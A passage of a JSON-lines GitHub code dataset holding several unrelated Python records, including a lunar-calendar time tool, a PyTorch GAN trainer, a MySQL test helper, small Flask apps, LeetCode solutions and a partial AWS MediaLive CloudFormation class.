HH:mm:ss} | {level} | {message}')\n args = get_apt()\n ip = get_host_ip()\n install = Install_Mongodb(args)\n install.main()\n","repo_name":"doctors-note/-Automatic-deployment-mysql","sub_path":"mongo_install.py","file_name":"mongo_install.py","file_ext":"py","file_size_in_byte":25828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11404102138","text":"# ===============================================\n# ===============================================\n# *\\src\\py_lib\\tltime.py\n# ===============================================\n# ===============================================\n#\n# tool to show local time now\n\n#import tensorflow as tf\n# tensorflow is no longer used\n\nimport argparse\n\nimport time\nimport datetime\nimport sxtwl\n\n\nGan = [\"甲\" , \"乙\" , \"丙\" , \"丁\" , \"戊\" , \"己\" , \"庚\" , \"辛\" , \"壬\" , \"癸\"]\n# 天干\n\nZhi = [\"子\" , \"丑\" , \"寅\" , \"卯\" , \"辰\" , \"巳\" , \"午\" , \"未\" , \"申\" , \"酉\" , \"戌\" , \"亥\"]\n# 地支\n\nShX = [\"鼠\" , \"牛\" , \"虎\" , \"兔\" , \"龙\" , \"蛇\" , \"马\" , \"羊\" , \"猴\" , \"鸡\" , \"狗\" , \"猪\"]\n# 生肖\n\nnumCn = [\"零\" , \"一\" , \"二\" , \"三\" , \"四\" , \"五\" , \"六\" , \"七\" , \"八\" , \"九\" , \"十\"]\n# 中文数字\n\njqmc = [\"冬至\" , \"小寒\" , \"大寒\" , \"立春\" , \"雨水\" , \"惊蛰\" , \"春分\" , \"清明\" , \"谷雨\" , \"立夏\" ,\n \"小满\" , \"芒种\" , \"夏至\" , \"小暑\" , \"大暑\" , \"立秋\" , \"处暑\" , \"白露\" , \"秋分\" , \"寒露\" ,\n \"霜降\" , \"立冬\" , \"小雪\" , \"大雪\"]\n# 节气\n\nMonCn = [\"正月\" , \"二月\" , \"三月\" , \"四月\" , \"五月\" , \"六月\" , \"七月\" , \"八月\" , \"九月\" , \"十月\" , \"十一月\" , \"腊月\"]\n# 农历月\n\nDayCn = [\"初一\" , \"初二\" , \"初三\" , \"初四\" , \"初五\" , \"初六\" , \"初七\" , \"初八\" , \"初九\" , \"初十\" , \n \"十一\" , \"十二\" , \"十三\" , \"十四\" , \"十五\" , \"十六\" , \"十七\" , \"十八\" , \"十九\" , \"二十\" , \n \"廿一\" , \"廿二\" , \"廿三\" , \"廿四\" , \"廿五\" , \"廿六\" , \"廿七\" , \"廿八\" , \"廿九\" , \"三十\" ,\n \"卅一\"]\n# 农历日\n\nWeekCn = [\"星期日\" , \"星期一\" , \"星期二\" , \"星期三\" , \"星期四\" , \"星期五\" , \"星期六\"]\n# 星期\n\n# tensorflow is no longer used to decode shell-command\n#\\code\n#\n# tf.app.flags.DEFINE_bool( 'system_time' , False , 'show system_time' )\n# tf.app.flags.DEFINE_bool( 'chinese_calendar' , False , 'show chinese_calendar' )\n#\n# FLAGS = tf.app.flags.FLAGS\n#\n#\\endcode\n\nparser = argparse.ArgumentParser( description = 'manual to this script' )\n\nparser.add_argument( '--timestamp' , type = bool , default = False )\nparser.add_argument( '--chinese_calendar' , type = bool , default = False )\n# add args definition\n\nargs = parser.parse_args()\n# save read-in args to val args\n\nprint()\n# print begin NULL line\n\ntoday = datetime.datetime.today()\n# datetime module: get today\n\nprint( \"> 现在时间:\" , time.strftime( '%Y-%m-%d %H:%M:%S' , time.localtime() ) , WeekCn[today.isoweekday()] )\n# print local time in format \"Y-M-D H:M:S\" and weekday ↓\n# isoweekday begin with 0 end with 6\n\nif args.chinese_calendar:\n\n# CC_today = sxtwl.fromSolar( 2020 , 6 , 20 )\n # debug line, test CC_month (测试农历闰月 2020.6.20为农历庚子年闰四月廿九)\n\n# CC_today = sxtwl.fromSolar( 2022 , 10 , 8 )\n # debug line, test chinese_calendar print (测试节气输出 2022.10.8为壬寅年九月十三 节气为寒露)\n\n CC_today = sxtwl.fromSolar( today.year , today.month , today.day ) # chinese_calendar today\n\n CC_year = CC_today.getYearGZ( True ) # chinese_calendar year\n\n CC_month = \"%s%s\" % ( '闰' if CC_today.isLunarLeap() # 判断闰月\n else '' , \n MonCn[CC_today.getLunarMonth()-1] )\n # chinese_calendar month\n # this is a bit complex, therefore here creates direct one string\n\n CC_day = CC_today.getLunarDay() # chinese_calendar day\n\n# print( Gan[CC_year.tg] + Zhi[CC_year.dz] + \"年\" + CC_month + DayCn[CC_day-1] )\n # debug line\n\n print( \"> 农历\" + Gan[CC_year.tg] + Zhi[CC_year.dz] + \"年\" + CC_month + DayCn[CC_day-1] , '%s' % jqmc[CC_today.getJieQi()] if CC_today.hasJieQi() \n else '' )\n # print chinese calendar\n\nif args.timestamp:\n print( \"> 系统时间戳:\" , time.time() )\n # print timestamp\n\nprint()\n# print end NULL line","repo_name":"Ace-Radom/Win_shell_tool_lib","sub_path":"src/py_lib/tltime.py","file_name":"tltime.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"19324877076","text":"import torch\r\nimport torch.nn as nn\r\nfrom torch.utils.data import DataLoader\r\nimport torchvision as tv\r\nimport numpy as np\r\nimport os\r\nimport random\r\nfrom torch.utils.tensorboard import SummaryWriter\r\n\r\n\r\n\r\nANIME_DATA = './dataset/anime_data/faces/'\r\nEXTRA_DATA = './dataset/extra_data/images/'\r\nmax_iteration = 50000\r\nd_update = 1\r\ng_update = 5\r\nbatch_size = 256\r\nnoise_dim = 100\r\nd_lr = 0.0002\r\ng_lr = 0.0002\r\nsave_every = 20\r\n\r\n# clip weight of D\r\n# use RMSProp instead of Adam\r\n# train more iteration of D\r\n\r\n# only use faces/ images/\r\n\r\nclass Dataset0(torch.utils.data.dataset.Dataset):\r\n def __init__(self, data, transform = None):\r\n self.trainData = data\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n return len(self.trainData)\r\n\r\n def __getitem__(self, idx):\r\n if self.transform:\r\n return self.transform(self.trainData[idx])\r\n return self.trainData[idx]\r\n\r\nclass D(nn.Module):\r\n def __init__(self) -> None:\r\n super().__init__()\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(in_channels=3,out_channels=32,kernel_size=3,padding=1),\r\n nn.BatchNorm2d(32),\r\n nn.ReLU(),\r\n nn.Conv2d(in_channels=32,out_channels=64,kernel_size=5, stride=2, padding=2), #16, 48, 48\r\n nn.BatchNorm2d(64),\r\n nn.ReLU(),\r\n nn.Conv2d(in_channels=64,out_channels=128,kernel_size=5, stride=2,padding=2), #16, 24, 24\r\n nn.BatchNorm2d(128),\r\n nn.ReLU(),\r\n nn.Conv2d(in_channels=128,out_channels=256,kernel_size=5, stride=2,padding=2),\r\n nn.BatchNorm2d(256),\r\n nn.ReLU(),\r\n )\r\n self.fc = nn.Sequential(\r\n nn.Linear(in_features = 8*8*256, out_features=2),\r\n # nn.Sigmoid()\r\n nn.Softmax(dim = 1)\r\n )\r\n\r\n def forward(self, x):\r\n out = self.conv(x)\r\n out = torch.reshape(out, (out.shape[0], -1))\r\n return self.fc(out)\r\n\r\nclass G(nn.Module):\r\n def __init__(self) -> None:\r\n super().__init__()\r\n self.fc = nn.Sequential(\r\n nn.Linear(in_features=noise_dim, out_features=128*16*16)\r\n )\r\n self.conv = nn.Sequential(\r\n nn.ConvTranspose2d(in_channels = 128, out_channels = 128, kernel_size = 5, stride=2, padding=2,output_padding=1),\r\n nn.Conv2d(in_channels=128,out_channels=128,kernel_size=5,padding=2),\r\n nn.BatchNorm2d(128),\r\n nn.LeakyReLU(),\r\n nn.ConvTranspose2d(in_channels = 128, out_channels = 128, kernel_size = 5, stride=2, padding=2,output_padding=1),\r\n nn.Conv2d(in_channels=128,out_channels=64,kernel_size=5,padding=2),\r\n nn.BatchNorm2d(64),\r\n nn.LeakyReLU(),\r\n nn.Conv2d(in_channels=64,out_channels=3,kernel_size=5,padding=2),\r\n nn.Tanh()\r\n )\r\n\r\n def forward(self, x):\r\n x = self.fc(x)\r\n x = torch.reshape(x, (x.shape[0], 128, 16, 16))\r\n return self.conv(x)\r\n\r\ndef train(discriminator, generator, dataloader, device, writer):\r\n discriminator.train()\r\n generator.train()\r\n d_optimizer = torch.optim.Adam(discriminator.parameters(), lr = d_lr)\r\n g_optimizer = torch.optim.Adam(generator.parameters(), lr = g_lr)\r\n criterions = nn.BCELoss()\r\n true_labels = torch.ones(batch_size).to(device)\r\n fake_labels = torch.zeros(batch_size).to(device)\r\n mix_labels = torch.cat([true_labels, fake_labels], dim = 0).to(device)\r\n train_d = 0\r\n for i in range(max_iteration):\r\n for iter, (img) in enumerate(dataloader):\r\n real_img = img.to(device)\r\n if iter % d_update == 0:\r\n # if train_d < 1:\r\n reals = discriminator(real_img)\r\n reals = reals[:,1].view(-1)\r\n noises = torch.randn(size = (batch_size, noise_dim)).to(device)\r\n fake_image = generator(noises)\r\n fakes = discriminator(fake_image)\r\n fakes = fakes[:,1].view(-1)\r\n d_loss = criterions(torch.cat([reals, fakes], dim = 0), mix_labels)\r\n d_optimizer.zero_grad()\r\n d_loss.backward()\r\n d_optimizer.step()\r\n loss = d_loss.to('cpu').detach().numpy()\r\n print('d_loss: ', d_loss.to('cpu').detach().numpy())\r\n if loss < 0.001:\r\n train_d = 5\r\n if iter % g_update == 0:\r\n # else:\r\n noises = torch.randn(size = (batch_size, noise_dim)).to(device)\r\n fake_image = generator(noises)\r\n output = discriminator(fake_image)\r\n output = output[:,1].view(-1)\r\n g_loss = criterions(output, true_labels)\r\n g_optimizer.zero_grad()\r\n g_loss.backward()\r\n g_optimizer.step()\r\n loss = g_loss.to('cpu').detach().numpy()\r\n print('g_loss: ', g_loss.to('cpu').detach().numpy())\r\n train_d -= 5\r\n print('out ', i)\r\n noise = torch.randn(size = (batch_size, noise_dim)).to(device)\r\n fake_images = generator(noise)\r\n fake_images += 1\r\n fake_images /=2\r\n fake_images = fake_images.to('cpu')\r\n writer.add_images(tag='title01', img_tensor= fake_images, global_step = i, dataformats='NCHW')\r\n writer.flush()\r\n # 保存模型\r\n if (i + 1) % save_every == 0:\r\n torch.save(discriminator.state_dict(), './' + 'd_{0}.pth'.format(i))\r\n torch.save(generator.state_dict(), './' + 'g_{0}.pth'.format(i))\r\n\r\n\r\ndef test():\r\n discriminator.eval()\r\n generator.eval()\r\n noise = torch.randn(size = (batch_size, noise_dim))\r\n output_images = generator(noise)\r\n # TODO print images\r\n\r\ndef loadData(datapath = ANIME_DATA):\r\n print('Now loading data')\r\n cache_dir = './data_cache.npy'\r\n print(cache_dir)\r\n if os.path.exists(cache_dir):\r\n print('use cache')\r\n return torch.from_numpy(np.load(cache_dir).astype(np.float32))\r\n print('reading...')\r\n images_list = os.listdir(ANIME_DATA)\r\n images = []\r\n for f in images_list:\r\n images.append(torch.unsqueeze(tv.io.read_image(datapath + f, mode = tv.io.ImageReadMode.RGB), dim = 0))\r\n data = torch.cat(images, dim = 0) / 255\r\n print(data.shape)\r\n np.save(cache_dir, data.numpy())\r\n print('cache saved')\r\n return data\r\n\r\nif __name__ == '__main__':\r\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n writer = SummaryWriter(log_dir = 'runs/fashion_mnist_experiment_1')\r\n discriminator = D().to(device)\r\n generator = G().to(device)\r\n # transform\r\n transforms = tv.transforms.Compose([\r\n tv.transforms.Resize([64,64]),\r\n tv.transforms.CenterCrop([64,64]),\r\n tv.transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\r\n ])\r\n training_data = Dataset0(data = loadData(), transform = transforms)\r\n dataloader = DataLoader(training_data, batch_size = batch_size, drop_last=True)\r\n train(discriminator, generator, dataloader, device, writer)\r\n print('done')\r\n exit()","repo_name":"zhangchaosd/LearningGAN","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":7131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6829837746","text":"from tools import gmc_mysql\nfrom data.run_sql import get_result_list\nfrom data import basic_dict\nimport pymysql\nfrom config import config\n\n\nclass RunSql(object):\n \"\"\"\n 获取和执行sql\n \"\"\"\n\n def __init__(self, sql_dict, *args, **kwargs):\n self.dict = sql_dict\n self.sql_string = args\n self.value_dicts = kwargs\n self.db = pymysql.connect(config.get_conf(\"mysql\", \"host\"),\n config.get_conf(\"mysql\", \"username\"),\n config.get_conf(\"mysql\", \"password\"))\n self.sql = []\n\n def run_sql(self):\n \"\"\"\n 连接数据库,执行sql\n \"\"\"\n cursor = self.db.cursor(pymysql.cursors.DictCursor)\n # cursor.execute(sql)\n result = cursor.fetchall()\n self.db.commit()\n self.db.close()\n\n return result\n\n def get_sql_string(self):\n \"\"\"\n 通过方法中传入的字符串获取sql\n \"\"\"\n new_sql = []\n for i in self.sql_string:\n i = get_result_list(i)\n new_sql += i\n return new_sql\n\n def replace_sql(self):\n \"\"\"\n 根据生成的字典,替换sql\n \"\"\"\n sql_list = self.get_sql_string()\n for i in self.value_dicts:\n self.dict[i] = self.value_dicts[i]\n for j in sql_list:\n for s in self.dict:\n if type(self.dict[s]) == int:\n j = j.replace(f\"[{s}]\", f\"{self.dict[s]}\")\n else:\n j = j.replace(f\"[{s}]\", f'\"{self.dict[s]}\"')\n self.sql.append(j)\n\n def get_sql_result(self,*args):\n \"\"\"\n 链接数据库,执行sql\n \"\"\"\n self.replace_sql()\n print(self.sql_string)\n result_list = []\n for i in self.sql:\n print(i)\n result_list += gmc_mysql.get_database(i)\n print(result_list)\n #/app-medical-technology/inspect/outpatient/cancel接口sql查询获取对应参数结果使用\n if self.dict.get(\"return_result_name\" ):\n if self.dict[\"return_result_name\"]==\"inspect_id\":\n result_list = result_list[0][self.dict[\"return_result_name\"]]\n result_list=[(result_list)]\n print(self.dict[\"return_result_name\"])\n else:\n result_list = result_list[0][self.dict[\"return_result_name\"]]\n print(self.dict[\"return_result_name\"])\n return result_list\n\n def validation_sql(self):\n result = self.get_sql_result()\n print(result, self.dict)\n if result:\n for i in result:\n for j in i:\n print(\"对比值\", str(i[j]), str(self.dict[j]))\n if str(i[j]) != str(self.dict[j]):\n return False\n return True\n\n\nif __name__ == '__main__':\n sql_data_dicts = basic_dict.sql_data_dicts\n s = RunSql(sql_data_dicts, \"query_inspect\", order_id=9867276, return_result_name=\"inspect_id\")\n # print(s.get_sql_string())\n print(s.get_sql_result())\n # print(s.validation_sql())","repo_name":"guozhiyan1/HttpRunner","sub_path":"tools/generate_run_sql.py","file_name":"generate_run_sql.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36843647248","text":"class Solution:\n def minimumXORSum(self, nums1, nums2):\n n = len(nums1)\n\n @cache\n def dp(i, mask):\n if i == n: return 0\n res = float('inf')\n for j in range(n):\n if mask >> j & 1 ^ 1: continue\n res = min(res, (nums1[i] ^ nums2[j]) + dp(i + 1, mask - (1 << j)))\n return res\n\n return dp(0, (1 << n) - 1)\n","repo_name":"simonesestili/problems-dsa","sub_path":"1879.py","file_name":"1879.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"6882012901","text":"import ast\n\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request\n\nfrom search import *\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"landing.html\")\n\n\n@app.route(\"/results\", methods=[\"POST\"])\ndef results():\n rawquery = request.form[\"query\"]\n query = reformquery(rawquery)\n if not query: # if the adjusted query is empty, do not continue\n return render_template(\"error.html\",\n reason=\"your query did not return any results\")\n else:\n dataframe = opendoc(\"data/database.csv\")\n twmatrix = generatesqrmatrix(dataframe)\n vectorlength = generatedveclen(twmatrix)\n dotproducts = getdotprod(query, dataframe)\n similarities = sim(dotproducts, query, vectorlength)\n results = rank(similarities)\n amountofresults = len(results)\n firstresult = results[0]\n sniplocks = getsniplocation(rawquery, results, \"test_data/\")\n snippets = getsnippet(sniplocks, \"test_data/\")\n fiveresults = list()\n for i in range(0, 5):\n fiveresults.append(results[i])\n if firstresult[1] == 0.0:\n return render_template(\n \"error.html\",\n reason=\n 'your query did not return any results. If in doubt, search \"Boeing\"',\n )\n else:\n return render_template(\n \"return.html\",\n query=rawquery,\n results=fiveresults,\n snippet=snippets,\n resultno=5,\n completeresults=results,\n amountofresults=amountofresults,\n )\n\n\n@app.route(\"/encore\", methods=[\"POST\"])\ndef encore():\n seenallresults = False\n # retrieve all form fields\n query = request.form[\"query\"]\n results = request.form[\"results\"] # represents the last rank returned\n resultno = int(request.form[\"resultno\"]) # by def. stored as string\n amountofresults = int(request.form[\"amountofresults\"])\n # The dictionaries and lists are returned as a string rather than as a list\n # or dict. The ast.literal_eval()-function converts this to an actual\n # function instead of a string.\n listedresults = ast.literal_eval(results)\n snippet = request.form[\"snippet\"]\n dictsnippets = ast.literal_eval(snippet)\n fiveresults = list()\n resultlimit = resultno + 5 # by default, docs are listed in the range 0-5\n if resultlimit >= amountofresults:\n # if the amount of documents exceeds the standard range, adjust the\n # range here\n resultlimit = amountofresults\n seenallresults = True # check to see if there can be more results seen\n for i in range(resultno, resultlimit):\n fiveresults.append(listedresults[i])\n return render_template(\n \"encore.html\",\n query=query,\n results=fiveresults,\n snippet=dictsnippets,\n resultno=resultlimit,\n completeresults=results,\n amountofresults=amountofresults,\n seenallresults=seenallresults,\n )\n\n\nif __name__ == \"__main__\":\n app.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n app.config[\"DEBUG\"] = True\n # app.config[\"SERVER_NAME\"] = \"127.0.0.1:5000\"\n app.run()\n","repo_name":"riverbit/zoekieloekie","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"75206626926","text":"\nfrom MACE.Visualization.Styles.Subplot import SubplotStyle, default_subplot_style\nfrom MACE.Visualization.Legends import DensityLegend, CoverageLegend\nimport math\nfrom collections import OrderedDict\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nplt.ioff()\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.patches import Rectangle\n\n\nclass Subplot(OrderedDict):\n\n def __init__(self, track_groups=None, y_start=None, y_end=None, x_start=None, x_end=None,\n style=default_subplot_style, title=None,\n legend=None, axes=None, type=\"track\", auto_scale=False, x_scale_factor=1,\n y_scale_factor=1, figure_x_y_ratio=None,\n xmax_multiplier=1.05, ymax_multiplier=1.1,\n xmin_multiplier=0.001, ymin_multiplier=0.001):\n if track_groups:\n OrderedDict.__init__(self, track_groups)\n else:\n OrderedDict.__init__(self)\n\n self.type = type\n self.y_start = y_start\n self.y_end = y_end\n self.x_start = x_start\n self.x_end = x_end\n\n if self.type == \"track\":\n if self.y_start is None:\n self.y_start = 0\n if self.x_start is None:\n self.x_start = 0\n if self.x_end is None:\n self.x_end = 1\n\n self.style = style\n self.title = title\n self.legend = legend\n self.axes = axes\n\n # TODO: add autoscale implementation\n #self.auto_scale = auto_scale\n self.x_scale_factor = x_scale_factor\n self.y_scale_factor = y_scale_factor\n self.x_y_ratio = None\n self.figure_x_y_ratio = figure_x_y_ratio\n\n self.xmax_multiplier = xmax_multiplier\n self.ymax_multiplier = ymax_multiplier\n\n self.xmin_multiplier = xmin_multiplier\n self.ymin_multiplier = ymin_multiplier\n\n def init_coordinates(self):\n if self.type == \"track\":\n y = self.y_start + self.style.internal_offset - self.style.distance\n\n for track_group_name in self:\n\n self[track_group_name].y_start = y + self.style.distance\n self[track_group_name].init_coordinates()\n y = self[track_group_name].y_end\n self.x_end = max(self.x_end, self[track_group_name].x_end)\n\n self.x_end = self.x_end * self.style.x_multiplier\n self.y_end = (y + self.style.internal_offset) * self.style.y_multiplier\n\n #if self.auto_scale:\n # self.y_scale_factor = 1\n self.x_y_ratio = self.x_end / self.y_end\n for track_group_name in self:\n self[track_group_name].subplot_x_y_ratio = self.x_y_ratio\n self[track_group_name].figure_x_y_ratio = self.figure_x_y_ratio\n for track_name in self[track_group_name]:\n self[track_group_name][track_name].figure_x_y_ratio = self.figure_x_y_ratio\n self[track_group_name][track_name].subplot_x_y_ratio = self.x_y_ratio\n #print(self.x_scale_factor)\n\n # TODO: rewrite coordinate calculation for legends. Create method init_coordinates in Legend class\n if isinstance(self.legend, (CoverageLegend, DensityLegend)):\n legend_height = (len(self.legend.thresholds) + 3) * self.legend.element_size\n else:\n legend_height = None\n\n if self.legend:\n self.legend.x_start = self.x_end\n\n if legend_height:\n self.legend.y_start = (self.y_end - legend_height) / 2\n else:\n self.legend.y_start = self.y_end/2\n self.legend.x_size = self.x_end / self.legend.style.x_size_denominator\n\n self.legend.init_coordinates()\n self.x_end = self.legend.x_end\n self.y_end = max(self.legend.y_end, self.y_end) if self.legend.y_end is not None else self.y_end\n\n elif self.type == \"plot\":\n pass\n\n def draw(self, axes=None):\n axes_to_use = axes if axes else self.axes if self.axes else plt.gca()\n self.axes = axes_to_use\n self.init_coordinates()\n\n for track_group in self:\n self[track_group].draw(axes=axes_to_use)\n\n #for track_group in self:\n # self[track_group].draw_borders(axes=axes_to_use)\n\n self.style.apply(x_max=self.x_end, y_max=self.y_end, axes=axes_to_use)\n\n plt.xlim(xmin=self.x_start - (self.x_end * self.xmin_multiplier), xmax=self.x_end )\n plt.ylim(ymin=self.y_start - (self.y_end * self.ymin_multiplier), ymax=self.y_end * self.ymax_multiplier)\n\n if self.title:\n plt.title(self.title, fontsize=self.style.title_fontsize, fontweight=self.style.title_fontweight)\n\n if self.legend:\n self.legend.draw()\n\n def hide(self, axes=None):\n axes_to_use = axes if axes else self.axes if self.axes else plt.gca()\n axes_to_use.set_axis_off()\n #axes_to_use.get_xaxis().set_visible(False)\n #axes_to_use.get_yaxis().set_visible(False)","repo_name":"mahajrod/MACE","sub_path":"MACE/Visualization/Subplots.py","file_name":"Subplots.py","file_ext":"py","file_size_in_byte":5102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30836379597","text":"import unittest\nfrom main import *\n\nclass UnitTests(unittest.TestCase) :\n def test_kinetic(self) : \n for i in range(10) :\n vel = np.zeros([7,2])\n myeng = 0\n for j in range(7) : \n vel[j,0], vel[j,1] = np.random.normal(), np.random.normal()\n myeng = myeng + vel[j,0]*vel[j,0] / 2 + vel[j,1]*vel[j,1] / 2\n self.assertTrue( np.abs( kinetic(vel) - myeng )<1e-6, \"your function does not calculate the kinetic energies correctly\" )\n","repo_name":"statistical-mechanics-exercises/molecular-dynamics-4","sub_path":"testing/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16879597050","text":"# -*- coding: utf-8 -*-\n#\n# Jesse@FDU-VTS-MIA\n# created @date: 2020/3/11\n#\nfrom typing import List\n\nclass Solution:\n def verifyPostorder(self, postorder: List[int]) -> bool:\n if not postorder or len(postorder) == 1:\n return True\n root_key = postorder[-1]\n sep = 0\n while sep < len(postorder)-1 and postorder[sep] < root_key:\n sep += 1\n left_sub = postorder[:sep]\n right_sub = postorder[sep: len(postorder)-1]\n for num in left_sub:\n if num > root_key:\n return False\n for num in right_sub:\n if num < root_key:\n return False\n left = self.verifyPostorder(left_sub)\n right = self.verifyPostorder(right_sub)\n return left and right\n","repo_name":"Jesse-Z/coding-practise","sub_path":"剑指offer/033 二叉搜索树的后序遍历序列.py","file_name":"033 二叉搜索树的后序遍历序列.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35451994576","text":"# pcost.py\n\nimport csv\n\n\ndef portfolio_cost(filename):\n '''\n Computes the total cost (shares*price) of a portfolio file\n '''\n total_cost = 0.0\n\n with open(filename, 'rt') as f:\n rows = csv.reader(f)\n headers = next(rows)\n for rowno, row in enumerate(rows, start=1):\n try:\n nshares = int(row[1])\n price = float(row[2])\n total_cost += nshares * price\n # This catches errors in int() and float() conversions above\n except ValueError:\n print(f'Row {rowno}: Bad row: {row}')\n return total_cost\n\nimport sys\nif len(sys.argv) == 2:\n filename = sys.argv[1]\nelse:\n filename = '../Data/portfolio.csv'\n\ncost = portfolio_cost(filename)\nprint('Total cost:', cost)\n","repo_name":"hoodielive/pythonscripts","sub_path":"Archived/chicago/portfolio_cost.2.4.py","file_name":"portfolio_cost.2.4.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36818788866","text":"for nt in range(int(input())):\n\tn = int(input())\n\tif n==1:\n\t\tprint (0)\n\t\tcontinue\n\tc3, c2 = 0, 0\n\tm = n\n\twhile n%3==0:\n\t\tn = n//3\n\t\tc3 += 1\n\tn = m\n\twhile n%2==0:\n\t\tn = n//2\n\t\tc2 += 1\n\tif c2==c3:\n\t\tn = m\n\t\tans = 0\n\t\twhile n%6==0:\n\t\t\tn = n//6\n\t\t\tans += 1\n\t\tif n==1:\n\t\t\tprint (ans)\n\t\telse:\n\t\t\tprint (-1)\n\telif c3>c2:\n\t\tn = m\n\t\tfor i in range(c3-c2):\n\t\t\tn = n*2\n\t\tans = c3 - c2\n\t\twhile n%6==0:\n\t\t\tn = n//6\n\t\t\tans += 1\n\t\tif n==1:\n\t\t\tprint (ans)\n\t\telse:\n\t\t\tprint (-1)\n\telse:\n\t\tprint (-1)","repo_name":"Naman18055/CF-Solutions","sub_path":"Round 653/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7066086908","text":"class FileSystem:\n\n def __init__(self):\n self.paths = {\"\": -1}\n\n def createPath(self, path: str, value: int) -> bool:\n if path in self.paths:\n return False\n path = path.split(\"/\")\n if len(path) < 2:\n return False\n if \"/\".join(path[:-1]) in self.paths:\n self.paths[\"/\".join(path)] = value\n return True\n return False\n\n def get(self, path: str) -> int:\n return self.paths.get(path, -1)\n\n\n# Your FileSystem object will be instantiated and called as such:\n# obj = FileSystem()\n# param_1 = obj.createPath(path,value)\n# param_2 = obj.get(path)","repo_name":"ziyuan-shen/leetcode_algorithm_python_solution","sub_path":"medium/ex1166.py","file_name":"ex1166.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36155348966","text":"from flask import Flask, render_template, jsonify, request\nfrom flask_cors import CORS, cross_origin\nimport os\n# from logger import App_logger\nfrom predict import predict_data\nfrom train import train_data\nimport pickle\n\n\napp = Flask(__name__)\n\n#log_writer = App_logger()\n\n@app.route('/',methods = ['GET'])\n@cross_origin()\ndef home_page():\n return render_template('index.html')\n\n\n@app.route('/train',methods = ['GET', 'POST'])\n@cross_origin()\ndef train():\n train_data()\n return render_template('index.html')\n\n\n@app.route('/predict',methods = ['GET', 'POST'])\n@cross_origin()\ndef predict():\n\n if request.method == 'POST':\n try:\n # file_object = open(\"logs/GeneralLogs.txt\", 'a+')\n # log_writer.log(file_object, 'Start getting data from UI')\n age = float(request.form['age'])\n workclass = (request.form['workclass'])\n fnlwgt = float(request.form['fnlwgt'])\n education = (request.form['education'])\n education_num = float(request.form['education_num'])\n marital_status = (request.form['marital_status'])\n occupation = (request.form['occupation'])\n relationship = (request.form['relationship'])\n race = (request.form['race'])\n sex = (request.form['sex'])\n capital_gain = float(request.form['capital_gain'])\n capital_loss = float(request.form['capital_loss'])\n hours_per_week = float(request.form['hours_per_week'])\n native_country = (request.form['native_country'])\n\n\n # log_writer.log(file_object, 'Complete getting data from UI')\n\n mydict = {'age':age,\t'workclass':workclass,\t'fnlwgt':fnlwgt,\t'education':education,\t'education_num':education_num,\n 'marital_status':marital_status,\t'occupation':occupation,\t'relationship':relationship,\t'race':race,\n 'sex':sex, 'capital_gain':capital_gain,\t'capital_loss':capital_loss,\t'hours_per_week':hours_per_week,\n 'native_country':native_country}\n # log_writer.log(file_object, 'Passing mydict to prediction.predict_data')\n prediction = predict_data(mydict)\n if prediction == 0:\n result = '<=50K'\n else:\n result = '>50K'\n return render_template('results.html', result=result)\n except Exception as e:\n print('The Exception message is: ', e)\n return 'something is wrong'\n # return render_template('results.html')\n else:\n return render_template('index.html')\n\n\nif __name__=='__main__':\n app.run(debug=True, host='127.0.0.1', port =5001 )","repo_name":"sauravchakraborty13069/wage_classification_xgboost","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8723210299","text":"import logging\nimport uuid\n\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom troposphere import (\n Template,\n GetAtt,\n mediaconnect,\n medialive,\n Ref,\n ec2,\n Select,\n Split,\n cloudfront,\n mediapackage,\n Output,\n Join,\n mediastore,\n Tags,\n Sub,\n cloudwatch,\n)\nfrom troposphere.mediapackage import StreamSelection\n\nfrom config import settings\nfrom . import CloudFormationStackGeneric\nfrom .channel_defaults import audio_defaults, output_defaults, video_defaults\nfrom .channel_defaults.dashboard import get_dashboard_body\nfrom ..enums import DISTRIBUTION_ORIGIN_ENDPOINT_STARTOVER_WINDOW\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass PreviewChannel(CloudFormationStackGeneric):\n def __init__(\n self,\n description,\n channel_name,\n channel_template,\n flow_name,\n flow_obj,\n preview_mp_channel_id,\n preview_channel_id,\n preview_origin_endpoint_id,\n preview_origin_id,\n ):\n 